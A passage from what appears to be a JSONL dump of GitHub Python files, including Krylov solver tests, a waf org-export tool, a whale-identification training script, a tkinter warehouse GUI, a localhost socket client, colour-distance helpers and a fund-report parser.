)\n# sol, info = solver(A, b, tol=1.0e-12)\n#\n# # final error norm correct?\n# # (if exact_solution was provided)\n# if ls.exact_solution is not None:\n# assert_almost_equal(\n# info.errnorms[-1],\n# krylov.utils.norm(\n# krylov.utils.shape_vec(ls.exact_solution)\n# - krylov.utils.shape_vec(sol.xk),\n# inner=ls.inner,\n# ),\n# )\n\n\n@pytest.mark.parametrize(\"solver\", [krylov.cg, krylov.minres, krylov.gmres])\ndef test_exact_solution_as_initial_guess(solver):\n A = np.diag([1.0e-3] + list(range(2, 11)))\n b = np.ones(10)\n x0 = np.linalg.solve(A, b)\n\n _, info = solver(A, b, x0=x0)\n assert len(info.resnorms) == 1\n\n\n@pytest.mark.parametrize(\"solver\", [krylov.cg, krylov.minres, krylov.gmres])\ndef test_m(solver):\n a = np.linspace(1.0, 2.0, 5)\n A = np.diag(a)\n A[0, 0] = 1e-2\n b = np.ones(5)\n M = np.diag(a)\n _, info = solver(A, b, M=M, tol=1.0e-12)\n assert info.resnorms[-1] <= 1.0e-12\n\n\n@pytest.mark.parametrize(\"solver\", [krylov.cg, krylov.minres, krylov.gmres])\ndef test_ml(solver):\n a = np.linspace(1.0, 2.0, 5)\n A = np.diag(a)\n A[0, 0] = 1e-2\n b = np.ones(5)\n M = np.diag(a)\n _, info = solver(A, b, Ml=M, tol=1.0e-12)\n assert info.resnorms[-1] <= 1.0e-12\n\n\n@pytest.mark.parametrize(\"solver\", [krylov.minres, krylov.gmres])\ndef test_mr(solver):\n a = np.linspace(1.0, 2.0, 5)\n A = np.diag(a)\n A[0, 0] = 1e-2\n b = np.ones(5)\n M = np.diag(a)\n _, info = solver(A, b, Mr=M, tol=1.0e-12)\n assert info.resnorms[-1] <= 1.0e-12\n\n\n@pytest.mark.parametrize(\n \"method, ref\",\n [\n (krylov.cg, [1004.1873775173957, 1000.0003174916551, 999.9999999997555]),\n (krylov.gmres, [1004.1873724888546, 1000.0003124630923, 999.999994971191]),\n (krylov.minres, [1004.187372488912, 1000.0003124632159, 999.9999949713145]),\n ],\n)\n@pytest.mark.parametrize(\"shape\", [(100,), (100, 1)])\ndef test_solvers(method, ref, shape):\n tol = 1.0e-11\n n = shape[0]\n A = np.diag([1.0e-3] + list(range(2, n + 1)))\n\n # Make sure the shapes are alright\n b = np.ones(shape)\n sol, _ = method(A, b)\n assert sol.shape == b.shape\n\n assert abs(np.sum(np.abs(sol)) - ref[0]) < tol * ref[0]\n assert abs(np.sqrt(np.dot(sol.T, sol)) - ref[1]) < tol * ref[1]\n assert abs(np.max(np.abs(sol)) - ref[2]) < tol * ref[2]\n\n\n@pytest.mark.parametrize(\n \"solver\",\n [krylov.cg, krylov.minres, krylov.gmres],\n)\ndef test_custom_inner_product(solver):\n tol = 1.0e-9\n n = 100\n A = np.diag([1.0e-3] + list(range(2, n + 1)))\n b = np.ones(n)\n\n def inner(x, y):\n assert x.shape == b.shape\n assert y.shape == b.shape\n w = 10 / np.arange(1, n + 1)\n return np.dot(x.T, w * y)\n\n sol, _ = solver(A, b, inner=inner)\n\n ref = 1004.1873775173957\n assert abs(np.sum(np.abs(sol)) - ref) < tol * ref\n ref = 1000.0003174916551\n assert abs(np.sqrt(np.dot(sol, sol)) - ref) < tol * ref\n ref = 999.9999999997555\n assert abs(np.max(np.abs(sol)) - ref) < tol * ref\n\n\n@pytest.mark.parametrize(\n \"solver\",\n [krylov.cg, krylov.minres, krylov.gmres],\n)\ndef test_custom_inner_product_nx1(solver):\n tol = 1.0e-9\n n = 100\n A = np.diag([1.0e-3] + list(range(2, n + 1)))\n b = np.ones((n, 1))\n\n def inner(x, y):\n assert x.shape == b.shape\n assert y.shape == b.shape\n w = 10 / np.arange(1, n + 1)\n return np.dot(x.T, w[:, None] * y)[0, 0]\n\n sol, _ = solver(A, b, inner=inner)\n\n ref = 1004.1873775173957\n assert abs(np.sum(np.abs(sol)) - ref) < tol * ref\n ref = 1000.0003174916551\n assert abs(np.sqrt(np.dot(sol.T, sol)) - ref) < tol * ref\n ref = 999.9999999997555\n assert abs(np.max(np.abs(sol)) - ref) < tol * ref\n\n\n@pytest.mark.parametrize(\"solver\", [krylov.cg, krylov.minres, krylov.gmres])\ndef test_scipy_sparse(solver):\n n = 5\n a = np.linspace(1.0, 2.0, n)\n a[-1] = 1e-2\n\n A = scipy.sparse.spdiags(a, [0], n, n)\n b = np.ones(n)\n\n sol, info = solver(A, b, tol=1.0e-12)\n assert info.resnorms[-1] <= 1.0e-12\n\n\n@pytest.mark.parametrize(\"solver\", [krylov.cg, krylov.minres, krylov.gmres])\ndef test_scipy_linear_operator(solver):\n n = 5\n a = np.linspace(1.0, 2.0, n)\n a[-1] = 1e-2\n\n A = scipy.sparse.linalg.LinearOperator((n, n), lambda x: a * x)\n b = np.ones(n)\n\n sol, info = solver(A, b, tol=1.0e-12)\n assert info.resnorms[-1] <= 1.0e-12\n\n\n@pytest.mark.parametrize(\"solver\", [krylov.cg, krylov.minres, krylov.gmres])\ndef test_custom_linear_operator(solver):\n n = 5\n\n class MyLinearOperator:\n def __init__(self):\n self.a = np.linspace(1.0, 2.0, n)\n self.a[-1] = 1e-2\n self.shape = (n, n)\n self.dtype = float\n\n def __matmul__(self, x):\n return self.a * x\n\n A = MyLinearOperator()\n b = np.ones(n)\n\n sol, info = solver(A, b, tol=1.0e-12)\n assert info.resnorms[-1] <= 1.0e-12\n","repo_name":"ju-liu/krylov","sub_path":"tests/test_solvers.py","file_name":"test_solvers.py","file_ext":"py","file_size_in_byte":6758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"38584384504","text":"#! /usr/bin/env waf\n'''A waf tool to perform org export.\n\nBy default it will execute an new instance of emacs for each export.\nThis can be slow and the emacs may lack the desired configuration. An\nalternative that address both of these is to use emacs daemon through\nemacsclient.\n\n waf configure --emacs-daemon=\"NAME\" [...]\n\nWhere NAME is the daemon naem. Eg when started as:\n\n emacs --daemon=myemacs\n\nThe --emacs-daemon=\"NAME\" may also be given at build time:\n\n waf --emacs-daemon=\"NAME\" --target=my-export-html\n\nYou may also run (server-start) inside a running emacs. If so, the\nname should be \"server\". Take caution, a large build may make the\nrunning emacs effectively unusable.\n\n'''\n\nimport time\nfrom waflib.Utils import to_list, subst_vars\nfrom waflib.Task import Task, TaskSemaphore\nfrom waflib.Logs import debug, info, error, warn\nfrom waflib import TaskGen\n\nclass org_export(Task):\n\n before = ['inst']\n\n export_file_name = None\n\n # Emacs will only write to a fixed file name, which then this task\n # may move to the target. But, two tasks making a file (of the\n # same extension) will collide. \n semaphore = TaskSemaphore(1)\n\n def __init__(self, *k, **kw):\n Task.__init__(self, *k, **kw)\n self.org_linked_files_done = False\n\n def scan(self):\n\n node = self.inputs[0]\n deps = set()\n debug(f'org: SCANNING {node}')\n file_links = set()\n for line in node.read().split(\"\\n\"):\n\n efn = \"#+export_file_name:\"\n if line.lower().startswith(efn):\n self.export_file_name = line.split(\":\",1)[1].strip()\n debug(\"org: scan found \" + self.export_file_name)\n continue\n\n pre = \"#+include:\"\n if line.lower().startswith(pre):\n fname = line[len(pre):].strip()\n fname = fname.split(\" \")[0]\n dep = node.parent.find_resource(fname)\n if dep:\n debug(f\"org: scan of {node} dependency found: {fname}\")\n deps.add(dep)\n else:\n debug(f\"org: scan of {node} dependency not found: {fname}\") \n\n for word in line.split(' '):\n if word.startswith (\"[[\"):\n word = word[2:].split(\"]\")[0]\n chunks = word.split(\":\")\n # debug(f'org: PARSED chunks={chunks}')\n if len(chunks) < 1:\n continue\n if chunks[0] != \"file\":\n continue\n flink = chunks[1]\n if flink.endswith(\".org\"):\n continue\n file_links.add(flink)\n\n # file_links available in raw_deps\n return (list(deps),list(file_links))\n\n def runnable_status(self):\n 'Install any linked files'\n ret = super(org_export, self).runnable_status() \n if self.org_linked_files_done:\n return ret\n\n bld = self.generator.bld\n flinks = bld.raw_deps.get(self.uid(), [])\n # debug(f'org: BLD: {type(bld)} {bld}')\n top_dir = bld.root.find_dir(bld.top_dir)\n node = self.inputs[0]\n outnode = self.outputs[0]\n fnodes = []\n debug(f'org: SCAN: {node} -> {outnode}')\n for flink in flinks:\n if not flink.strip():\n continue\n if node.parent.find_dir(flink):\n debug(f'org: SCAN: ignoring linked directory {flink}')\n continue\n fnode = node.parent.find_resource(flink)\n if not fnode:\n warn(f'org: SCAN: failed to find {flink} needed by {fnode}')\n continue\n debug(f'org: SCAN: found link: {flink} as {fnode}')\n fnodes.append(fnode)\n if fnodes:\n debug(f'org: SCAN: {node} installing ({len(fnodes)}) to {bld.env.DOCS_INSTALL_PATH} relative to {top_dir}: {fnodes}')\n bld.install_files(bld.env.DOCS_INSTALL_PATH, fnodes,\n cwd=top_dir, relative_trick=True, postpone=False)\n self.org_linked_files_done = True\n return ret\n\n def run(self):\n onode = self.inputs[0]\n enode = self.outputs[0]\n\n dotext = '.' + self.func.split(\"-\")[-1]\n\n efn = self.export_file_name\n if efn:\n if not efn.endswith(dotext):\n efn += dotext\n tmp = onode.parent.make_node(efn)\n else:\n tmp = onode.parent.make_node(onode.name.replace('.org', dotext))\n\n debug(f\"org: emacs will produce: {tmp}\")\n\n if 'EMACSCLIENT' in self.env and self.env.EMACS_DAEMON:\n cmd = \"\"\"${EMACSCLIENT} -s \"${EMACS_DAEMON}\" -e '(progn (find-file \"%s\") (%s))' > /dev/null 2>&1\"\"\" % \\\n (onode.abspath(), self.func)\n else:\n cmd = \"${EMACS} %s --batch -f %s\" % (onode.abspath(), self.func)\n if tmp != enode:\n debug(f\"org: will move {tmp} to {enode}\")\n move = \"mv %s %s\" % (tmp, enode.abspath())\n cmd += \" && \" + move\n cmd = subst_vars(cmd, self.env)\n debug(f'org: COMMAND: {cmd}')\n return self.exec_command(cmd, shell=True)\n \n\nclass org_export_html(org_export):\n func = \"org-html-export-to-html\"\n\nclass org_export_pdf(org_export):\n func = \"org-latex-export-to-pdf\"\n\n\n@TaskGen.feature(\"org2html\", \"org2pdf\")\n@TaskGen.before('process_source')\ndef transform_source(tgen):\n tgen.inputs = tgen.to_nodes(getattr(tgen, 'source', []))\n\n\n@TaskGen.extension('.org')\ndef process_org(tgen, node):\n \n tgt = getattr(tgen, 'target', [])\n if isinstance(tgt, str):\n tgt = tgen.bld.path.find_or_declare(tgt)\n tgt = tgen.to_nodes(tgt)\n\n if 'org2html' in tgen.features:\n tgt = tgt or node.change_ext(\".html\")\n tsk = tgen.create_task(\"org_export_html\", node,tgt)\n\n if 'org2pdf' in tgen.features:\n tgt = tgt or node.change_ext(\".pdf\")\n tsk = tgen.create_task(\"org_export_pdf\", node, tgt)\n\n\ndef options(opt):\n opt.add_option(\"--emacs-daemon\", default=None, type=str,\n help=\"Given name of emacs daemon to use via emacsclient for org export. If none, use emacs directly (which is slower and may not pick up your config) [default=None], Note default daemon is called 'server'\")\n\ndef configure(cfg):\n cfg.find_program(\"emacs\", var=\"EMACS\")\n cfg.find_program(\"emacsclient\", var=\"EMACSCLIENT\", mandatory=False)\n\n cfg.env.EMACS_DAEMON = cfg.options.emacs_daemon\n\ndef build(bld):\n emacsd = getattr(bld.options, 'emacs_daemon')\n if emacsd is not None:\n bld.env.EMACS_DAEMON = emacsd\n","repo_name":"rennney/wire-cell-toolkit","sub_path":"waft/org.py","file_name":"org.py","file_ext":"py","file_size_in_byte":6678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"11610963489","text":"import numpy as np\nimport os\nimport utils.data_manipulation as dm # utils is a package I am putting together of useful functions\nimport utils.sbatch_scripts as ss\n\n\n\n# In Greg Field's data :::\n# Cell Types : Num Cells\n# ------------------------------\n# offBriskTransient : 55 cells\n# offBriskSustained : 43 cells\n# onBriskTransient : 39 cells\n# offExpanding : 13 cells\n# offTransient : 4 cells\n# onBriskSustained : 6 cells\n# onTransient : 7 cells\n# dsOnoffDown : 7 cells\n# dsOnoffRight : 3 cells\n# dsOnoffLeft : 3 cells\n# dsOnoffUp : 2 cells\n\n\n#\ndirHomeLoc, dirScratch = dm.set_dir_tree()\n\n# Parameters we can loop over.\nstims = ['NatMov']#,'Wnoise']\ncell_types = ['allCells'] \ncellSubTypeCombinations = [ ['offBriskTransient'], ['offBriskTransient','offBriskSustained'], ['offBriskTransient','onBriskTransient'] ] # a list of lists. Each internal list is a combination of cell sub types to consider as a group to find Cell Assemblies within them.\n#cellSubTypeCombinations = [ ['offBriskTransient','onBriskTransient'] ]\nnum_test_samps_4xValS \t= [1] #[1, 10, 100] \nmodel_CA_overcompleteness = [1] \t\t# [1,2] \t# how many times more cell assemblies we have than cells (1 means complete - N=M, 2 means 2x overcomplete)\nSW_bins = [2]#, 2,1,0] \t\t\t\t\t# ms. Build up spikewords from groups of cells in the same trial that fire within SW_bins of eachother.\nlearning_rates = [0.5] #[1.0, 0.5, 0.1]\nlRateScaleS = [[1., 0.1, 0.1]]# , [1., 0.1, 1.] ] # Multiplicative scaling to Pia,Pi,Q learning rates. Can set to zero and take Pi taken out of model essentially.\n\n\n\nyLo_Vals \t= [0] #[1] \t\t# If |y|<=yLo, then we force the z=0 inference solution and change Pi. This defines cells assemblies to be more than 1 cell.\nyHi_Vals\t= [1000] \t\t# If |y|>=yHi, then we assume at least 1 CA is on and disallow z=0 inference solution and change Pia.\nyMinSWs \t= [1]\t\t\t# DOING BELOW THING WITH YYY inside pgm functions. --> (set to 0, so does nothing) \n\t\t\t\t\t\t\t\t# Only look at spikewords that have more active cells than yLo for EM learning. That is, ignore |y|0.5)==ones[:batch_size].byte()).float().mean().item(), n=batch_size)\n\t\tacc.update(((torch.sigmoid(negative.view(-1))>0.5)==zeros[:batch_size].byte()).float().mean().item(), n=batch_size)\n\n\t\ttorch.cuda.synchronize()\n\t\tbatch_time.update(time.time() - end)\n\t\tpbar.set_postfix(loss=losses.avg, acc=acc.avg)\n\t\tpbar.update(1)\n\t\tend = time.time()\n\t\tinputs = prefetcher.next_batch()\n\t\n\tpbar.close()\n\tif scheduler is not None:\n\t\tscheduler.step()\n\n\tlogger.info(\"TRAIN Epoch: %d Loss: %.2f Acc: %.2f Batch Time: %.2fs Data Time: %.2fs\" % (epoch+1, losses.avg, acc.avg, batch_time.avg, data_time.avg))\n\ndef eval_loop(epoch, loaders, model, criterion, config, logger):\n\tbatch_time = AverageMeter()\n\ttotal_images = len(loaders[\"train\"].dataset)\n\tnum_images = loaders[\"train\"].sampler.indices.size(0)\n\tnum_test_images = loaders[\"test\"].sampler.indices.size(0)\n\tmodel.eval()\n\tpbar = tqdm(desc=f\"TRAIN EVAL Epoch {epoch+1}\", total=len(loaders[\"train\"]))\n\tprefetcher = d.Prefetcher(loaders[\"train\"])\n\twith torch.no_grad():\n\t\tbatch_i = -1\n\t\tinputs, targets = prefetcher.next_batch()\n\n\t\tend = time.time()\n\t\ttrain_labels = torch.zeros(len(loaders[\"train\"]), config.EVAL_BATCH_SIZE).cuda().long()\n\t\t# First num_images are train predictions, the rest (num_test_images) are test predictions\n\t\tpredictions = torch.zeros(len(loaders[\"train\"])+len(loaders[\"test\"]), config.EVAL_BATCH_SIZE, config.OUT_DIM).cuda()\n\t\twhile inputs is not None:\n\t\t\tbatch_i += 1\n\t\t\tpreds = model.features(inputs)\n\t\t\tif preds.size(0) < config.EVAL_BATCH_SIZE:\n\t\t\t\tpredictions[batch_i][:preds.size(0)].add_(preds)\n\t\t\t\ttrain_labels[batch_i][:targets.size(0)].add_(targets.long())\n\t\t\telse:\n\t\t\t\tpredictions[batch_i].add_(preds)\n\t\t\t\ttrain_labels[batch_i].add_(targets.long())\n\n\t\t\ttorch.cuda.synchronize()\n\t\t\tbatch_time.update(time.time() - end)\n\t\t\tend = time.time()\n\t\t\tinputs, targets = prefetcher.next_batch()\n\t\t\tpbar.set_postfix()\n\t\t\tpbar.update(1)\n\t\n\t\tpbar.close()\n\t\tpbar = tqdm(desc=f\"TEST EVAL Epoch {epoch+1}\", total=len(loaders[\"test\"]))\n\t\tprefetcher = d.Prefetcher(loaders[\"test\"])\n\t\tinputs, targets = prefetcher.next_batch()\n\n\t\tend = time.time()\n\t\ttest_labels = torch.zeros(len(loaders[\"test\"]), config.EVAL_BATCH_SIZE).cuda().long()\n\t\ttest_i = -1\n\t\twhile inputs is not None:\n\t\t\tbatch_i += 1\n\t\t\ttest_i += 1\n\t\t\tpreds = model.features(inputs)\n\t\t\tif preds.size(0) < config.EVAL_BATCH_SIZE:\n\t\t\t\tpredictions[batch_i][:preds.size(0)].add_(preds)\n\t\t\t\ttest_labels[test_i][:targets.size(0)].add_(targets.long())\n\t\t\telse:\n\t\t\t\tpredictions[batch_i].add_(preds)\n\t\t\t\ttest_labels[test_i].add_(targets.long())\n\n\t\t\ttorch.cuda.synchronize()\n\t\t\tbatch_time.update(time.time() - end)\n\t\t\tend = time.time()\n\t\t\tinputs, targets = prefetcher.next_batch()\n\t\t\tpbar.set_postfix()\n\t\t\tpbar.update(1)\n\tpbar.close()\n\n\ttrain_predictions = predictions[:len(loaders[\"train\"])].view(-1, config.OUT_DIM)[:num_images]\n\ttest_predictions = predictions[len(loaders[\"train\"]):].view(-1, config.OUT_DIM)[:num_test_images]\n\tpredictions = torch.zeros(total_images, config.OUT_DIM).cuda()\n\tpredictions[:num_images].add_(train_predictions)\n\tpredictions[num_images:].add_(test_predictions)\n\tdel inputs, targets, train_predictions, test_predictions, prefetcher\n\ttorch.cuda.empty_cache()\n\n\ttrain_labels = train_labels.view(-1)[:num_images]\n\ttest_labels = test_labels.view(-1)[:num_test_images]\n\t#breakpoint()\n\thead_batch_size = 256*config.EVAL_BATCH_SIZE\n\tloader = thd.DataLoader(thd.TensorDataset(predictions[:num_images]), batch_size=head_batch_size, shuffle=False)\n\tmatrix = torch.zeros(total_images, num_images).cuda()\n\twith torch.no_grad():\n\t\tfor i, p in enumerate(tqdm(predictions, desc=f\"HEAD EVAL\", total=total_images)):\n\t\t\tp = p.expand(num_images, predictions.size(1))\n\t\t\tif i < num_images-1:\n\t\t\t\ti += 1\n\t\t\t\t#breakpoint()\n\t\t\t\ttry:\n\t\t\t\t\ttmp = torch.sigmoid(model.head(p[i:], predictions[i:num_images])).view(-1)\n\t\t\t\texcept:\n\t\t\t\t\tprint(i)\n\t\t\t\t\tbreakpoint()\n\t\t\t\tmatrix[i,i:].add_(tmp)\n\t\t\telif i >= num_images:\n\t\t\t\ttmp = torch.sigmoid(model.head(p, predictions[:num_images])).view(-1)\n\t\t\t\tmatrix[i].add_(tmp)\n\t\n\tmatrix[:num_images,:] = matrix[:num_images,:].add(matrix[:num_images,:].t())\n\tvalues, indices = matrix.topk(6, 1, largest=True)\n\tpred_targets = train_labels[indices]\n\tunique_preds = unique(pred_targets)\n\tunique_preds[:,-1].mul_((pred_targets.min(1)[0] == 0).long())\n\taccuracies = topk_accuracy_preds(unique_preds[:num_images], train_labels, topk=(1,3,5))\n\tlogger.info(\"TRAIN EVAL Epoch: %d Top-1: %.2f Top-3 %.2f Top-5 %.2f\" % ((epoch+1,) + tuple(accuracies)))\n\taccuracies = topk_accuracy_preds(unique_preds[num_images:], test_labels, topk=(1,3,5))\n\tlogger.info(\"TEST EVAL Epoch: %d Top-1: %.2f Top-3 %.2f Top-5 %.2f\" % ((epoch+1,) + tuple(accuracies)))\n\ndef single_run(dataset, model, config, logger, run_num=0):\n\tstart = time.time()\n\tcriterion = load_criterion(config, logger)\n\toptimizer = load_optimizer(model, config, logger)\n\tscheduler = optim.lr_scheduler.StepLR(optimizer, 10, gamma=0.1)\n\n\tif config.MIXUP:\n\t\tlogger.info(f\"Using mixup with alpha={config.ALPHA}\")\n\t\tmixup = Mixup(config.ALPHA)\n\telse:\n\t\tmixup = None\n\n\tloaders = get_loaders(dataset, config, logger)\n\ttrain_loader = get_loaders(dataset, config, logger, n=config.DATASET_N)[\"train\"]\n\tfor epoch in range(config.EPOCHS):\n\n\t\ttrain_loop(epoch, train_loader, model, criterion, optimizer, config, logger, mixup=mixup, scheduler=scheduler)\n\n\t\tif (epoch+1) % config.EVAL_INTERVAL == 0:\n\t\t\teval_loop(epoch, loaders, model, criterion, config, logger)\n\n\t\tif config.DATASET_N == 2 and ((epoch+1) % config.REINDEX_INTERVAL) == 0 and (epoch+1) < config.EPOCHS:\n\t\t\tlogger.info(f\"Reindexing dataset at epoch {epoch+1}\")\n\t\t\ttrain_loader = get_loaders(dataset, config, logger, n=config.DATASET_N)[\"train\"]\n\t\n\tend = time.time() - start\n\tlogger.info(\"Run %d finished at %dmin %.2fs\" % (run_num, end // 60, end % 60))\n\ndef cross_validate(dataset, model, config, logger):\n\tkfold = KFold(n_splits=5, random_state=config.SEED)\n\n\tfor split_num, (train_idx, test_idx) in enumerate(kfold.split(dataset.df.index.values)):\n\t\tlogger.info(f\"Running split {split_num}\")\n\t\tdataset.reset_index(train_idx, test_idx)\n\t\tsingle_run(dataset, model, config, logger, run_num=split_num)\n\ndef main(args):\n\tglobal config\n\tconfig = load_config(args.config_file)\n\tconfig.NW = args.num_workers\n\tconfig.MULTI_GPU = args.multi_gpu\n\tconfig.CV = args.cross_validate\n\tconfig.MIXUP = args.mixup\n\tlogger = setup_logger(args.no_snaps)\n\tif not args.no_snaps:\n\t\tsave_config(config)\n\n\tlogger.info(f\"Setting seed {config.SEED}\")\n\tset_seed(config.SEED)\n\n\tdataset = get_dataset(config, logger)\n\tmodel = load_model(config, logger)\n\n\tif config.CV:\n\t\tcross_validate(dataset, model, config, logger)\n\telse:\n\t\tsingle_run(dataset, model, config, logger)\n\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser(description=\"Training CLI\")\n\tparser.add_argument(\"config_file\", metavar=\"FILEPATH\", type=str, help=\"Config file.\")\n\tparser.add_argument(\"--mixup\", action=\"store_true\", help=\"Flag whether to prevent mixup.\")\n\tparser.add_argument(\"-cv\", \"--cross_validate\", action=\"store_true\", help=\"Flag whether to use cross validation.\")\n\tparser.add_argument(\"--no_snaps\", action=\"store_true\", help=\"Flag whether to prevent from storing snapshots.\")\n\tparser.add_argument(\"-nw\", \"--num_workers\", metavar=\"INT\", type=int, default=6, help=\"Number of processes (workers).\")\n\tparser.add_argument(\"--gpu_device\", metavar=\"INT\", type=int, default=None, help=\"ID of a GPU to use when multiple GPUs are available.\")\n\tparser.add_argument(\"--multi_gpu\", action=\"store_true\", help=\"Flag whether to use all available GPUs.\")\n\targs = parser.parse_args()\n\n\tif args.gpu_device is not None:\n\t\ttorch.cuda.set_device(args.gpu_device)\n\n\tmain(args)\n","repo_name":"danielhavir/whale-identification","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":16329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5269624899","text":"from tkinter import *\r\nfrom main import myBasket\r\nfrom main import myWarehouse\r\nfrom gui_class import gui_class\r\n\r\nwindow = Tk()\r\nwindow.geometry(\"750x600\")\r\nmyGUI = gui_class()\r\n\r\nwindow.title(\"Main Menu\")\r\nicon = PhotoImage(file='H:\\\\Framework\\\\Uebung_1\\\\warehouse1234\\\\feelsgoodman.png')\r\nwindow.iconphoto(True, icon)\r\n\r\ndef label_reload():\r\n upText = myBasket.get_total_item_quantity()\r\n number_products_label.configure(text=upText)\r\n number_products_label.after(400, label_reload)\r\n\r\ndef label_reload2():\r\n upText2 = myBasket.get_total_basket_cost()\r\n total_cost_label.configure(text=upText2)\r\n total_cost_label.after(400, label_reload2)\r\n\r\nfor z in myWarehouse.cat_list:\r\n Button(window, text=z, command= lambda ztemp=z : myGUI.open_new_cat_window(ztemp), padx=30, pady=20).grid(row=myGUI.grid_sorter_y(myWarehouse.cat_list.index(z)), column=myGUI.grid_sorter_x(myWarehouse.cat_list.index(z)))\r\n\r\nexit_button = Button(window, text=\"Programm verlassen\", command=window.destroy)\r\n\r\nnumber_products_label = Label(window, text=myBasket.get_total_item_quantity(), padx=30, pady=30)\r\ntotal_cost_label = Label(window, text=myBasket.get_total_basket_cost(), padx=30, pady=30)\r\nclear_basket_button = Button(window, text=\"Clear Basket\", command= lambda : [myWarehouse.return_list_to_warehouse(myBasket.basket),myBasket.reset_basket()])\r\ngo_to_basket_button = Button(window, text=\"Go to basket\", command=myGUI.go_to_basket_window)\r\nLabel(window, text=\"current item quantity:\",padx=30, pady=30).grid(row=0, column=4)\r\nLabel(window, text=\"current total cost:\",padx=30, pady=30).grid(row=1, column=4)\r\nwarehouse_products = Button(window, text= \"show products\", command= myWarehouse.show_stock, padx=30, pady=30)\r\nbasket_products = Button(window, text= \"show products\", command= myBasket.show_basket, padx=30, pady=30)\r\n\r\n\r\nexit_button.grid(row=3, column=2)\r\n\r\nnumber_products_label.grid(row=0, column=5)\r\ntotal_cost_label.grid(row=1, column=5)\r\nclear_basket_button.grid(row=1, column=6)\r\ngo_to_basket_button.grid(row=0, column=6)\r\nexit_button.grid(row=2, column=6)\r\nwarehouse_products.grid(row=3, column=6)\r\nbasket_products.grid(row=4, column=6)\r\n\r\nlabel_reload()\r\nlabel_reload2()\r\n\r\nwindow.mainloop()","repo_name":"viertje/private_stuff","sub_path":"uebung_2/warehouse1234/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8047854209","text":"#coding:utf-8\nimport os\nimport time\n# for windows\nos.system('cls')\n#os.system(\"ls\")\ntime.sleep(0.5)\n\nimport socket\n\nhost, port = ('localhost', 5566)\nsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ntry:\n \n socket.connect((host, port))\n print(\"Client connecté !\")\n data = \"Bonjour Serveur, je suis le Client !:\"\n data = data.encode(\"utf8\")\n socket.sendall(data)\n \nexcept: #ConnectionRefusedError (exemple d'erreur)\n print(\"Connexion au serveur échouée !\")\nfinally:\n socket.close()\n\n","repo_name":"lxkrv/Formation_Python","sub_path":"33-Sockets-client.py","file_name":"33-Sockets-client.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36721301265","text":"from math import sqrt\n\n\ndef get_deltas(x, y):\n x = list(map(int, x))\n y = list(map(int, y))\n dr = (x[0] - y[0])\n dg = (x[1] - y[1])\n db = (x[2] - y[2])\n return dr, dg, db\n\n\ndef luminance_distance(x, y):\n r = (int(x[0]) + int(y[0])) / 2\n dr, dg, db = get_deltas(x, y)\n return sqrt((2 + r / 256) * dr ** 2 + 4 * dg ** 2 + (2 * ((255 - r) / 256)) * db ** 2)\n\n\nmax_luminance = luminance_distance([0, 0, 0], [255, 255, 255])\n\n\ndef euclidean_distance(x, y):\n dr, dg, db = get_deltas(x, y)\n return sqrt(dr ** 2 + dg ** 2 + db ** 2)\n\n\nmax_euclidean = euclidean_distance([0, 0, 0], [255, 255, 255])\n\n\ndef euclidean_similarity(x, y):\n dr, dg, db = get_deltas(x, y)\n return max_euclidean - sqrt(dr ** 2 + dg ** 2 + db ** 2)\n\n\ndef euclidean_similarity_normalized(x, y):\n return euclidean_similarity(x, y) / max_euclidean\n\n\ndef luminance_similarity(x, y):\n r = (int(x[0]) + int(y[0])) / 2\n dr, dg, db = get_deltas(x, y)\n return max_luminance - sqrt((2 + r / 256) * dr ** 2 + 4 * dg ** 2 + (2 * ((255 - r) / 256)) * db ** 2)\n\n\ndef luminance_similarity_normalized(x, y):\n return luminance_similarity(x, y) / max_luminance\n\n\ndistances = {\n \"euclidean\": euclidean_distance,\n \"luminance\": luminance_distance,\n \"euclidean_sim\": euclidean_similarity,\n \"luminance_sim\": luminance_similarity,\n \"luminance_sim_norm\": luminance_similarity_normalized,\n \"euclidean_sim_norm\": euclidean_similarity_normalized\n}\n","repo_name":"lnghrdntcr/Graph-Based-Image-Segmentation","sub_path":"libs/linalg.py","file_name":"linalg.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39072024859","text":"# -*- coding: utf-8 -*-\n'''\nDESCRIPTION\n-----------\nThis is a module to \n1.extract the info about fund code, report date, filed date,\nfrom the title and path of a report;\n2. aggregate all info into a single panel data format, and;\n3. export as an excel file\n\nCONTENTS\n--------\n- panel_info_extractor\n\nOTHER INFO.\n-----------\n- Last upate: R4/8/18(Moku)\n- Author: GOTO Ryusuke \n- Contact: \n - Email: yuhang1012yong@link.cuhk.edu.hk (preferred)\n - WeChat: L13079237\n\n'''\n\nimport os\nfrom joblib import Parallel, delayed\nimport pandas as pd\nimport numpy as np\nimport re\nfrom tqdm import tqdm\nfrom utils import num_cn2eng, get_type\n\nclass panel_info_extractor: \n def __init__(self,\n code_info_dict_path: str, \n all_file_path: str):\n \n self.all_file_path = all_file_path\n \n # initialise the fund info dict, which can be used to match fund code to some other fund info\n raw_dict = pd.read_csv(code_info_dict_path, encoding = 'gbk')\n raw_dict.columns = ['code','name', 'inv_typeI', 'inv_type_II', 'fund_type']\n code_info_dict = dict([(raw_dict.iloc[idx,0].split('.')[0], raw_dict.iloc[idx,:]) for idx in range(len(raw_dict))])\n self.code_info_dict = code_info_dict\n \n self.code_list = os.listdir(all_file_path)\n self.code_file_path_dict = dict([(code, all_file_path + '/' + code) for code in self.code_list])\n \n def process_single_code_info(self,code: str):\n code_file_path = self.code_file_path_dict[code]\n code_file_list = os.listdir(code_file_path)\n \n report_info_df = pd.DataFrame(columns = ['file_name','report_type', 'year', 'quarter',\n 'date','info','type',\n 'report_year', 'month', 'day'])\n \n year_detector = re.compile(r'[0-9,一,二,三,四,五,六,七,八,九,零]{4}年')\n quarter_detector = 